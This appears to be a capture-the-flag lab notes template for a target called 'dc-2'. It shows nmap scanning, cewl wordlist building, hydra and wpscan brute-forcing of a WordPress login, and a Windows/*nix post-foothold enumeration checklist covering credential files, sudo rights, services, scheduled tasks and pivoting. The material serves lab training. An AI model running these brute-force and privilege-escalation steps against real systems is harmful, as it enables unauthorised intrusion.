nmap -sV -p- 192.168.129.194 -A
Last updated
cewl http://dc-2 -w wordlist hydra 192.168.129.194 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&testcookie=1:Error" -L wordlist -P wordlist -t 64wpscan --url http://dc-2/ -U users.txt -P wordlist Document here:
- Windows
- "whoami /all" output
- *nix
- "id" output
- "sudo -l" outputDocument here:
- Windows
- "systeminfo" or "Get-ComputerInfo" output
- *nix
- "uname -a" output
- "cat /etc/os-release" (or similar) outputDocument here any interesting username after running the below commands:
- Windows
- Domain:
- "net user /domain" or "Get-ADUser -Filter *" output
- Workgroup:
- "net user" or "Get-LocalUser" output
- *nix
- "cat /etc/passwd" outputDocument here any interesting groups after running the below commands:
- Windows
- Domain:
- "net group /domain" or "Get-ADGroup -Filter *" output
- Workgroup:
- "net localgroup" or "Get-LocalGroup" output
- *nix
- "cat /etc/group" outputDocument here any interesting / additional interfaces:
- Windows
- "ipconfig" or "Get-NetAdapter" output
- *nix
- "ip address" or "ifconfig" outputIf targeting a network and enumerating additional hosts...
Document here:
- Windows
- "arp -a" or "Get-NetNeighbor" output
- *nix
- "ip neigh" or "arp -a" outputIf targeting a network and enumerating additional hosts...
Document here:
- Windows
- "route print" or "Get-NetRoute" output
- *nix
- "ip route" or "route" outputDocument here any ports listening on loopback or not available to the outside:
- Windows
- "netstat -ano | findstr /i listening" or "Get-NetTCPConnection -State Listen" output
- *nix
- "netstat -tanup | grep -i listen" outputIf the host has access to additional routes / interfaces:
- Look at the IP address space and network mask
- Find a ping sweep script that will work for the target network
- Or you could try:
- Transfering "nmap" or some other host discover tool to the host
- Set up a SOCKS proxy and try a port scan through the footholdFirst...
Enumerate processes:
- Windows
- "tasklist"
- "Get-Process"
- "Get-CimInstance -ClassName Win32_Process | Select-Object Name, @{Name = 'Owner' ; Expression = {$owner = $_ | Invoke-CimMethod -MethodName GetOwner -ErrorAction SilentlyContinue ; if ($owner.ReturnValue -eq 0) {$owner.Domain + '\' + $owner.User}}}, CommandLine | Sort-Object Owner | Format-List"
- *nix
- "ps auxf"
Then...
Document here:
- Any interesting processes run by users/administrators
- Any vulnerable applications
- Any intersting command line arguments visible- Windows
- First...
Enumerate services:
- "sc.exe query"
- Then "sc.exe qc <service-name>"
- List the configuration for any interesting services
- "Get-CimInstance -ClassName Win32_Service | Select-Object Name, StartName, PathName | Sort-Object Name | Format-List"
- Then...
Check for things like:
- Vulnerable service versions
- Unquoted service path
- Service path permissions too open?
- *nix
- First...
Enumerate services:
- "service --status-all" or "systemctl list-units"
- Then...
Check for things like:
- Vulnerable service versions
- Configuration files
- Writable unit files
- Writable service binaries
Then...
Document here:
- Any interesting services or vulnerabilities
- Any vulnerable service versions
- Any intersting configuration filesFirst...
Enumerate scheduled tasks:
- Windows
- "schtasks /QUERY /FO LIST /V | findstr /i /c:'taskname' /c:'run as user' /c:'task to run'"
- "Get-CimInstance -Namespace Root/Microsoft/Windows/TaskScheduler -ClassName MSFT_ScheduledTask | Select-Object TaskName, @{Name = 'User' ; Expression = {$_.Principal.UserId}}, @{Name = 'Action' ; Expression = {($_.Actions.Execute + ' ' + $_.Actions.Arguments)}} | Format-List"
- *nix
- "crontab -l"
- "cat /etc/cron* 2>/dev/null"
- "cat /var/spool/cron/crontabs/* 2>/dev/null"
Then...
Document here:
- Any interesting scheduled tasks
- Any writable paths in the scheduled task
- Any intersting command line arguments visibleFile contentsFlag hereFlag here